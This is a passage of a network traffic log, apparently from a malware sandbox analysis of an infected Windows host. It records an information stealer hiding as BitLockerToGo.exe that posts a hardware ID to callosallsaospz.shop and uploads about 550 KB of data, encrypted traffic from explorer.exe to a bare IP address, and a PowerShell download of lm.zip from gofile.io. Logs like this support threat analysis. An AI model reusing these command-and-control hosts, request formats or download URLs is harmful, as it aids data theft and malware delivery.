n8iw3Kd7nX4Y/xcC8+buTwQ2vVZi0YUWhUTPnQbtz2TQnHHF0wD7jRiKDdQ1TMRHcnHZmvvIMU3sDDLyba+30D1il/HRMRyfpQYlVLie8suggSERw5mCA0QlU9Hit4nJ2JDBS4pb5k0y1f/VL+7Iv0yYOMiadVZlHpZhQ7RjoR8fbc5WjWqO0ZxBHqNJI5VFIEX6BqQrqtC2hHnSPP90KbwnoO8LRnkrb+y8ywVQoveCQkXfrNCgWhwVIkKpjXi
2024-07-24 17:57:00 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:56:59 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:00 UTC	685	IN	Data Raw: 68 54 6d 67 32 59 76 6f 6a 6a 6d 49 4d 46 49 62 49 2b 6c 56 50 73 53 34 75 74 53 4b 74 48 58 42 64 49 75 78 61 46 6d 68 6e 76 6d 65 6c 4d 6b 49 43 33 48 62 58 55 54 70 4f 53 38 5a 47 62 75 61 4b 42 4a 64 37 35 50 56 6e 4f 47 2b 59 79 30 53 6c 46 55 36 6a 37 4f 73 48 4f 77 33 4e 4a 33 5a 52 6f 2b 65 59 6f 62 6e 45 79 44 78 46 66 6a 34 7a 7a 4c 57 76 79 55 64 64 41 47 71 46 6f 53 53 6e 74 5a 71 41 75 70 35 36 52 45 45 56 79 7a 31 39 66 67 32 70 45 65 75 50 44 35 63 48 49 72 74 66 4f 63 39 77 2f 4f 67 68 4b 63 67 51 33 73 5a 30 67 56 32 59 56 55 50 52 4c 4b 74 74 53 74 2f 41 34 57 30 75 6e 56 4b 7a 48 4a 6a 50 53 4a 67 33 68 56 78 4d 42 70 50 6a 45 76 62 4a 31 77 36 75 4e 76 4a 6e 66 78 61 30 66 37 6a 74 2b 4c 35 55 73 54 66 52 2b 33 56 46 66 63 41 67 42 77 Data Ascii: hTmg2YvojjmIMFIbI+lVPsS4utSKtHXBdIuxaFmhnvmelMkIC3HbXUTpOS8ZGbuaKBJd75PVnOG+Yy0SlFU6j7OsHOw3NJ3ZRo+eYobnEyDxFfj4zzLWvyUddAGqFoSSntZqAup56REEVyz19fg2pEeuPD5cHIrtfOc9w/OghKcgQ3sZ0gV2YVUPRLKttSt/A4W0unVKzHJjPSJg3hVxMBpPjEvbJ1w6uNvJnfxa0f7jt+L5UsTfR+3VFfcAgBw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.10	49767	188.114.96.3	443	4216	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:59 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1225 Host: callosallsaospz.shop
2024-07-24 17:56:59 UTC	1225	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-24 17:57:00 UTC	810	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:57:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6o1u9q3s2mbtqo318khe3bnsn3; expires=Sun, 17-Nov-2024 11:43:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4pJbBR4nMeH%2F2toWRDefiqtPqRPeGZda6UVKKQxTOJ7oSjEmNLUMDq18cUcDVXOSFOAwlArDt4wGz8R52eJ%2Fl6bBUdKtGprsCIgsBem%2FU2F3%2FH7IIFXKJ3xru5lulgUqUaypxgR5ew%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85ca428f4332e2-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:57:00 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-24 17:57:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.10	49768	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:00 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:00 UTC	1122	OUT	Data Raw: 70 4d 78 63 4a 57 77 69 64 71 68 48 38 4f 33 6b 4e 77 64 5a 41 38 58 30 4b 4b 78 70 7a 4b 2f 65 5a 64 66 47 72 68 46 63 77 37 64 52 59 71 35 44 4f 47 58 30 52 30 64 2b 38 4b 4a 2b 44 76 6c 6e 58 63 65 46 37 32 35 4c 58 73 77 30 69 4b 31 71 38 50 4e 35 65 55 77 57 72 4a 4e 41 62 37 4c 35 73 65 6d 7a 4e 61 76 73 37 44 36 76 65 74 59 51 6c 38 4f 63 32 56 30 6f 36 77 4a 68 4b 70 46 54 53 71 78 77 47 41 47 64 76 6f 4d 79 6a 6e 79 35 31 69 48 48 6d 37 43 54 30 4f 38 38 62 4b 59 6b 72 2f 5a 65 4a 71 64 4c 74 35 59 62 65 69 31 4a 4e 58 49 69 46 5a 70 57 50 50 68 6b 76 43 50 32 69 4d 4d 38 57 66 49 36 51 32 45 5a 59 5a 54 57 35 53 46 65 76 47 4f 6d 4b 6f 2f 51 49 4d 7a 7a 42 48 7a 36 36 42 34 4c 4a 72 57 2b 75 57 43 62 76 6c 58 76 74 5a 34 36 2f 76 76 48 4d 79 57 Data Ascii: pMxcJWwidqhH8O3kNwdZA8X0KKxpzK/eZdfGrhFcw7dRYq5DOGX0R0d+8KJ+DvlnXceF725LXsw0iK1q8PN5eUwWrJNAb7L5semzNavs7D6vetYQl8Oc2V0o6wJhKpFTSqxwGAGdvoMyjny51iHHm7CT0O88bKYkr/ZeJqdLt5Ybei1JNXIiFZpWPPhkvCP2iMM8WfI6Q2EZYZTW5SFevGOmKo/QIMzzBHz66B4LJrW+uWCbvlXvtZ46/vvHMyW
2024-07-24 17:57:01 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:01 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:01 UTC	685	IN	Data Raw: 55 4d 4f 56 62 54 6b 4e 56 71 52 30 34 4e 72 62 6a 78 45 47 4b 70 35 41 4a 38 55 39 50 45 43 4f 30 52 49 43 79 78 6f 5a 48 48 6e 30 63 2b 6a 4d 30 58 44 47 59 71 33 73 2b 57 44 6c 50 43 68 52 76 79 58 58 4b 38 47 45 63 4f 66 2b 57 6d 6b 6c 59 55 54 58 6b 6a 42 6c 58 34 2f 72 78 6d 61 4f 4a 61 57 61 47 51 7a 4c 42 73 73 57 74 56 44 37 42 61 62 61 53 46 76 77 4c 56 57 51 76 37 79 6c 36 63 4d 48 2b 46 2b 6a 71 53 4f 38 64 57 57 79 78 34 65 78 63 69 43 66 6c 53 5a 68 39 34 4b 65 71 6e 59 57 65 70 65 59 75 7a 59 6e 69 31 73 4c 36 5a 46 43 72 5a 38 63 6d 64 73 45 79 30 50 73 65 6c 30 49 35 4a 45 6e 39 32 66 46 30 70 73 38 51 54 68 48 59 6a 61 55 63 74 37 43 36 39 6d 70 6e 56 73 50 31 30 62 67 41 75 74 62 7a 76 6d 71 45 41 32 56 47 45 4d 63 35 44 77 69 70 6e 41 Data Ascii: UMOVbTkNVqR04NrbjxEGKp5AJ8U9PECO0RICyxoZHHn0c+jM0XDGYq3s+WDlPChRvyXXK8GEcOf+WmklYUTXkjBlX4/rxmaOJaWaGQzLBssWtVD7BabaSFvwLVWQv7yl6cMH+F+jqSO8dWWyx4exciCflSZh94KeqnYWepeYuzYni1sL6ZFCrZ8cmdsEy0Psel0I5JEn92fF0ps8QThHYjaUct7C69mpnVsP10bgAutbzvmqEA2VGEMc5DwipnA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.10	49769	188.114.96.3	443	4216	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:02 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 551715 Host: callosallsaospz.shop
2024-07-24 17:57:02 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-24 17:57:02 UTC	15331	OUT	Data Raw: 61 8d 04 93 7e 17 2c e4 c7 ea bf 54 9b 38 b6 ad da 94 ca 0d 46 8e 75 9a 81 ec 38 32 0f 5e b3 4d 49 5d ca 74 54 de c6 4f e7 0e 2b d1 19 f6 e9 be 9d fd e8 66 2b 7b 60 ae bd af 56 b1 79 ca 92 7c e3 9c 36 61 9d 14 8b 3f da 30 6e 9b ec 6c de 1b 6a 98 82 8d 0a b4 d2 10 7a 59 27 e7 ff 5b f4 f6 8d d4 34 b1 20 8a cc a5 11 f7 ad 67 fb 70 39 f9 ca 7b 20 59 1d 8c 34 7c cd 51 a7 c0 bd 01 d0 da c1 20 77 b8 d4 0d 5a 8f 08 68 7d e1 00 48 43 c1 de 58 46 da 00 b5 02 0f ab 62 d8 7c a7 61 95 b9 bb 73 dd df 16 3f 2c 1c 9d 03 23 d1 4a d5 e2 d6 f0 5c f7 07 8f b6 aa 8f fd ba 9f 56 be 19 40 b4 59 99 bb fc da 98 00 7d 88 36 84 63 9f 25 80 c1 21 c5 ba 14 54 c3 6c 71 6c 97 c7 50 09 29 b9 a7 b6 a2 d9 6a 00 2c 3f 77 e5 bb 52 e6 e7 6c f1 c4 ba f8 b5 e2 95 eb e6 f1 c1 de 2e 1f fe b7 1d Data Ascii: a~,T8Fu82^MI]tTO+f+{`Vy\|6a?0nljzY'[4 gp9{ Y4\|Q wZh}HCXFb\|as?,#J\V@Y}6c%!TlqlP)j,?wRl.
2024-07-24 17:57:02 UTC	15331	OUT	Data Raw: 44 dd 88 d6 75 e9 fc 74 30 96 fb e8 96 83 bb f1 08 97 13 2a 55 2e ae cb 41 37 5c cb ed 62 a9 ac ff 6a 1d b5 c1 6a 69 c5 c3 a3 ce 56 da 3d 3e 9f 08 1e e5 d2 10 c4 2d 82 29 cd d4 4e 20 c6 c7 91 4f fb 5e db f7 92 af 36 59 c9 29 25 ac ec 65 42 68 59 70 b7 a8 93 23 47 5e 96 f7 f6 29 6a 14 a6 5e 34 db 03 db d1 17 8c c4 9c c1 c4 bd 75 98 07 7e 02 ce 3e 38 41 fb 58 71 b3 00 db 73 a7 09 7c 10 ee 71 d8 41 47 be 4a 8c 5b d4 0c ea 8d bb ac 5c 1e d7 5c 69 a3 17 4a 93 67 ba 34 91 21 b2 b5 a2 a9 3b 25 fb 47 88 fc 70 98 9a 74 41 9c 93 b2 3c 29 25 3c 00 9f b7 6d 5b 47 2e 67 16 ed 26 f6 24 ff cc 8a d3 97 9e 99 e7 39 5e 53 cf 4a db c0 70 aa 64 34 d4 b2 97 e8 33 a3 92 75 be 1c 79 76 db 4c fb 35 83 f2 3c 46 fa ed 51 d9 d4 3c 59 e5 fd 03 f1 1e 83 61 f9 0f 14 d2 46 3d 58 bc d2 Data Ascii: Dut0*U.A7\bjjiV=>-)N O^6Y)%eBhYp#G^)j^4u~>8AXqs\|qAGJ[\\iJg4!;%GptA<)%<m[G.g&$9^SJpd43uyvL5<FQ<YaF=X
2024-07-24 17:57:02 UTC	15331	OUT	Data Raw: 0e e2 b9 0a a0 8b a5 51 65 5b 2f 7f ee 9a 4d a4 d5 87 e1 c4 61 27 c7 6e 0f 35 8b 3e 19 f2 be 71 7e e9 93 ff bb c9 33 f4 c1 c1 0b 3f 43 34 c9 ba 6a e8 29 ba 19 8e e2 fa 18 81 c8 1b bd 2f 60 f8 91 f8 40 5c 29 10 43 d8 77 22 78 b0 e5 6d 6b 65 da ed 9a 9b 3a 5f 80 95 2b 5e 33 1f fa c8 53 3b ab 7c 39 cd f0 8b 4c 2e fb ea 1d 02 2f e5 de fd d6 c4 b0 4c 36 7b ee e9 54 18 af 24 19 f8 cf e7 99 4f 51 17 78 0d ad bb bb 66 26 18 42 42 61 16 58 e2 61 5a 1e 2b 6d 4a 97 03 c4 d0 87 68 5c b4 a9 df 15 b4 10 47 fa fb 52 3d be d0 ba e9 cc 3b 6f e5 d4 ae ad 07 1d c4 89 7d 7a 97 7f 22 80 c5 0c 6e 09 66 ae 90 54 d4 b3 7c 87 fe d2 55 93 09 a0 15 4a 8a 8e 95 3e 0b c9 c7 5a 0c cb 58 87 9b 3a 00 bf ce 65 3a ea 66 cc 3d 38 40 90 fe 04 54 cf ea ac 8f 36 3a ad 5a c2 ba 67 e0 61 69 ae Data Ascii: Qe[/Ma'n5>q~3?C4j)/`@\)Cw"xmke:_+^3S;\|9L./L6{T$OQxf&BBaXaZ+mJh\GR=;o}z"nfT\|UJ>ZX:e:f=8@T6:Zgai
2024-07-24 17:57:02 UTC	15331	OUT	Data Raw: 6e 0a 61 31 74 62 b0 c1 9f a0 0d cd 68 23 3f 23 43 59 fb f4 62 c8 65 b6 1b 71 27 3c ba de bb ef fb 90 04 22 99 db c8 29 55 61 9d de 44 6e 86 f6 8b 76 34 ce af 6e 06 c0 5e 25 77 fa 9f 27 c4 d3 78 77 30 61 5e 8c df 23 bc 95 aa 47 2f d6 9c 96 9e ed ba 4c 33 a4 0b df e9 2c 42 aa f5 69 6c 40 e0 c1 9e d1 1c 1d 4d 92 e9 46 e1 94 c8 65 55 99 dc 68 de f6 3f 86 4e fb 9a 21 b5 eb 44 d1 fb 22 7a 89 ed 0d f5 b6 9c 2b 60 1b bf 23 ba 71 eb 94 a8 32 ab 50 14 73 99 d8 58 f0 94 b8 29 b1 4f 84 7e 13 17 3c 07 8a 5a 83 11 8c 82 03 e5 5b 5b a5 3c df de 1e 1a 61 a5 a4 3c f2 ae 79 8f 64 67 06 17 97 86 45 51 1a 87 86 97 e5 b8 71 47 92 42 34 34 95 22 a8 d3 3c 5e f4 7b f3 83 91 f8 ea f1 79 9f 7d f8 2b ff 8f e2 69 8a a2 fe 3f 4b 66 00 1a 7e 7a ef 80 38 2f 30 72 56 95 06 f9 03 7f 27 Data Ascii: na1tbh#?#CYbeq'<")UaDnv4n^%w'xw0a^#G/L3,Bil@MFeUh?N!D"z+`#q2PsX)O~<Z[[<a<ydgEQqGB44"<^{y}+i?Kf~z8/0rV'
2024-07-24 17:57:02 UTC	15331	OUT	Data Raw: 3c a0 3c 02 36 c3 82 c8 7d b4 5a 0c b0 0a 6a 48 c9 a3 aa 66 b7 aa 1e 1b 0a 1a f8 a1 93 7d c7 bc 4a 87 00 b2 4c f3 5e 35 ba 1f e4 90 3f 20 9b 0c c8 47 79 41 f1 23 8c 6f 1f 47 ff b9 ce bc 7b 1e 1f 18 ba 4e c0 54 d7 f6 d0 42 21 2a 04 41 9e b4 bc e5 a7 13 c9 ae 18 0b 88 ee 57 0c 26 20 32 27 03 bf 75 5d 28 90 30 6b e9 9b 9a 2b a2 5b e3 e3 b4 1b b1 af 7a 7e 22 70 7c ea 60 23 02 90 cb a0 4e f6 ac bb e4 ba 07 fa 09 2d f5 54 fd b4 d6 9f 20 16 4a c1 06 70 60 d9 99 ab 83 7a e4 12 4c 29 4f 37 22 7a 09 49 f0 5d 45 24 7e 58 10 62 5a 82 c6 ac 7b 07 cb 5e dd a9 ff 63 a2 61 9e 96 72 09 38 a7 7e 74 69 7d 06 13 f6 ee 96 4b b7 84 41 48 27 6f 9e e7 84 05 33 64 dc 0e df d2 ee 50 12 75 9a ce 07 79 71 ac e5 1b 7c 91 21 4b 4b 52 fb 6b 55 30 58 21 cc af a9 86 48 fb ca f3 59 16 ea Data Ascii: <<6}ZjHf}JL^5? GyA#oG{NTB!*AW& 2'u](0k+[z~"p\|`#N-T Jp`zL)O7"zI]E$~XbZ{^car8~ti}KAH'o3dPuyq\|!KKRkU0X!HY
2024-07-24 17:57:02 UTC	15331	OUT	Data Raw: ca 29 c8 90 5e 81 ec 3c 22 ea 3e 88 0e 13 4f 6b dd 51 de 7b ed b3 fa 9e e4 61 2b 17 a6 8b e8 3c 95 fd b7 62 a2 78 d8 4d e5 82 40 81 d3 bf d0 48 0b fa 46 82 e1 5c e3 00 a5 44 f4 e4 29 db 74 53 b3 93 31 ee 33 b9 01 44 41 48 d0 16 e8 03 93 d8 02 c1 e0 bb 6a d4 0c a9 70 3f ec e5 ae 01 0a 8e a8 1c 76 19 a5 b9 0a 10 c2 43 71 2e f6 6a f7 3d c4 4e fc 07 ef 7f 57 2f 7d 49 e7 f8 d8 2f 38 52 ac bf 13 76 d3 91 b2 93 f7 3c 8a 79 83 de 6d 72 b3 fd 8b c7 db 88 1f 0f 45 0d 6f b7 da 8e a7 69 c3 d7 47 b1 d6 b8 c4 04 2f 33 22 81 4a 2c e3 e3 85 9b 09 73 2d d7 92 d9 c8 19 0c 28 16 b0 cb ac 15 c8 22 21 96 7c 9a d2 22 6a ac 79 79 53 20 da f1 c3 2b 09 d0 79 58 ba fe ce d1 c3 dd 57 b8 7f 68 94 b5 b5 6b 5d 8d 94 1d d6 c2 0e 5b 9f 54 50 c2 53 a8 d8 9f da 69 57 e0 cf 5e 35 d2 df 59 Data Ascii: )^<">OkQ{a+<bxM@HF\D)tS13DAHjp?vCq.j=NW/}I/8Rv<ymrEoiG/3"J,s-("!\|"jyyS +yXWhk][TPSiW^5Y
2024-07-24 17:57:02 UTC	15331	OUT	Data Raw: 5c b9 c3 4b 18 ba 01 48 93 32 ea 02 30 ee a1 12 e0 c7 bc 60 d4 1c 56 a9 07 7a 16 6d fd 09 e1 a6 9d 77 4f 15 92 ef 05 bc 93 77 fe 56 81 3c ae 83 9b 68 25 d2 04 64 e3 88 05 27 be 6b 88 3e 6c fc e3 89 06 81 3c 42 c7 15 9c d9 e8 33 a5 aa 89 81 1b 0c 2a 8a 59 7c 48 ff 36 06 04 a3 21 10 82 dd d6 1f f9 ae 05 6f c7 20 87 b1 80 94 a5 94 78 1e 14 48 08 f0 03 c2 3a 91 17 c4 a7 32 57 8a 60 d4 0f d9 02 70 9a f5 9e 0e 8c 28 24 e4 db 46 d5 86 7b b8 81 3b 82 e9 5c 12 0f eb 59 74 83 e1 a3 dc f5 f7 72 11 38 f7 32 5b 14 fb f0 c2 85 17 a4 d7 f1 15 39 02 e0 20 63 ec 49 e0 f4 64 d5 1f 12 05 2a 3b df e1 38 14 e4 07 fb b1 19 53 3c 98 a1 13 ed df 18 c6 bb 3b 8b dc bf a1 0c 90 b8 64 c3 3d 1a 1d 8e 5c 40 14 28 e3 72 5f c1 2c 19 ce 7f 0d 5b a0 15 c7 9e 0e 86 bf 5b 88 f4 e5 e1 65 61 Data Ascii: \KH20`VzmwOwV<h%d'k>l<B3Y\|H6!o xH:2W`p($F{;\Ytr82[9 cId;8S<;d=\@(r_,[[ea
2024-07-24 17:57:02 UTC	15331	OUT	Data Raw: 48 24 73 e3 83 35 1e 53 9e d2 01 e9 1b 93 66 d6 3f d0 c8 ee fe 2a 4c 3a 41 cb f9 1f bb 27 cc 2f 38 02 93 23 30 8e ad 4c af f4 6c f0 16 59 16 17 09 eb da 5f fc f8 01 06 0e 54 c1 2f 23 27 de cc 94 cd 7e 64 6c 23 82 b4 eb 27 18 e9 bd 51 47 92 e4 d9 b9 2d 5b 4d 8a 9e 45 58 69 66 79 f8 ae cc ec 6b 74 3f 8a 46 4d ec f7 18 3d 64 d4 1a ff c6 b1 08 b7 f7 6e ea 54 5d cb 5f f5 c5 57 dd 8a db 22 f8 79 9e 7e ac 32 0c 43 f6 f1 07 cd 3d 93 33 98 8d 5a 8f 3f c1 0c 6f f2 4c ed 40 60 41 c8 70 45 ee 88 eb 5a fe c8 ad a1 2e 5e 49 6c c8 d2 37 8b 32 73 af 74 9f 88 29 53 93 df 5d b6 ad 57 3b b7 b7 5d 6b d8 de 16 d7 3e bd 98 23 c3 f2 59 f5 46 8c 7e 08 f4 28 3e 99 42 a0 2e c4 6f bc f3 0b 50 0f 4f 9c 20 29 7c 5b 92 80 98 b3 81 69 96 24 42 7e fa b2 8d ad d3 87 da 9c c8 f1 9c ff f5 Data Ascii: H$s5Sf?*L:A'/8#0LlY_T/#'~dl#'QG-[MEXifykt?FM=dnT]_W"y~2C=3Z?oL@`ApEZ.^Il72st)S]W;]k>#YF~(>B.oPO )\|[i$B~
2024-07-24 17:57:02 UTC	15331	OUT	Data Raw: ef 57 88 75 00 59 ff 40 24 5a 68 46 83 91 cc 06 09 61 52 24 02 b8 e8 c8 78 c9 e3 91 35 97 fb 76 be 6b 0f 22 81 fd e3 5f 65 5c 5d e6 af fd bd 1a 30 f3 91 b1 6d 36 9e b9 db 48 f1 5e 3a 5d d3 cc 3c ca 9e 39 6c 6a 84 91 23 b4 0b 16 2e 65 0b bc 57 4f 4c 88 1b 34 db c4 af e3 f4 9c a3 64 a9 ee 16 66 e0 51 0f f7 ef 28 ef 38 53 58 71 e3 4c 4d e8 1d e1 e2 30 6c 10 ea 67 8e 43 8e bc ba fc f1 a0 e1 c0 1f 4f d6 17 bf fa a8 fa e1 9f 35 9b 91 56 ad 12 36 87 9a c6 da 36 bc 23 f4 31 34 37 5d bb 60 b9 e1 c0 bd b3 22 11 2b 9f 64 37 4f 3f db 79 5a e8 8f e5 4a a0 2a 4b 76 cf b9 80 1a 4a 91 ec 40 ba 3d de 19 bd 62 c9 b6 b1 0d be c5 09 f9 71 23 49 52 5f 5c 50 d1 02 8e e2 b1 71 29 51 8c 27 d2 22 cb e2 6b 93 ea 19 c7 77 47 a9 c8 3d fe d6 f6 32 64 12 b9 fe de ef ba 06 34 56 98 ff Data Ascii: WuY@$ZhFaR$x5vk"_e\]0m6H^:]<9lj#.eWOL4dfQ(8SXqLM0lgCO5V66#147]`"+d7O?yZJ*KvJ@=bq#IR_\Pq)Q'"kwG=2d4V
2024-07-24 17:57:03 UTC	808	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:57:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ep2fbhlqlaljigsu1s1gne8mhq; expires=Sun, 17-Nov-2024 11:43:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Yk599aFNyEb4xWcGCWXOic3xP743fkh%2B5COVTf7Ost6xFu0FqQzEk6IbkmOXvFUgD1tQvCHD4fuKDQXNFRyGzEIRwxeOoDqYXeKJgMxK0X%2Fo5jpI5LR43%2FADmGWEHnBZNX8Ku95lA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85ca503dd943b8-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.10	49770	31.14.70.245	443	6872	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:02 UTC	196	OUT	GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: store4.gofile.io
2024-07-24 17:57:02 UTC	577	IN	HTTP/1.1 200 OK Server: nginx/1.27.0 Date: Wed, 24 Jul 2024 17:57:02 GMT Content-Type: application/zip Content-Length: 528925 Connection: close Accept-Ranges: bytes Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range Content-Disposition: attachment; filename*=UTF-8''lm.zip Last-Modified: Sat, 20 Jul 2024 15:36:00 GMT
2024-07-24 17:57:02 UTC	3541	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 15 7b f3 58 c4 92 38 a6 85 28 05 00 fb 29 05 00 08 00 00 00 64 61 74 61 2e 62 69 6e 00 1f 2c e0 d3 60 9c e8 00 00 00 00 5e b9 dc 29 05 00 b2 c8 30 94 0e 17 00 00 00 02 94 0e 17 00 00 00 e2 f0 92 75 77 e0 85 72 c2 bd 55 09 ce ca ca 84 3b 3f 3f 0e c2 8b 6b 30 14 f1 48 5f 7b 5a 41 91 0d 98 6b bd 94 61 e5 1b 0f c7 0d e8 65 1b 1e 86 14 20 20 20 20 20 de 75 6a 5f b1 2f fb 26 7b 45 0a be 05 ce 79 a3 39 b7 9a 41 a5 20 83 99 3c e6 22 4c 5c 50 75 cc ac e5 bf bb 2b 64 04 96 20 44 f6 f2 9e fe a4 c7 03 8b c5 fc 9a db 81 f9 b6 56 87 3e 30 c0 10 f4 29 a7 48 41 3b 11 24 9d e8 5a 82 2f 28 ea db 56 e9 10 b5 2d be c2 89 6f 5a b4 5b 18 da 65 94 95 19 65 cb 0e 2a 07 ab d8 36 9d 69 45 5b bd d9 93 47 b7 30 36 34 d4 e2 c4 5e 50 b0 df 6a 5e a1 fd 2a Data Ascii: PK{X8()data.bin,`^)0uwrU;??k0H_{ZAkae uj_/&{Ey9A <"L\Pu+d DV>0)HA;$Z/(V-oZ[ee6iE[G064^Pj^
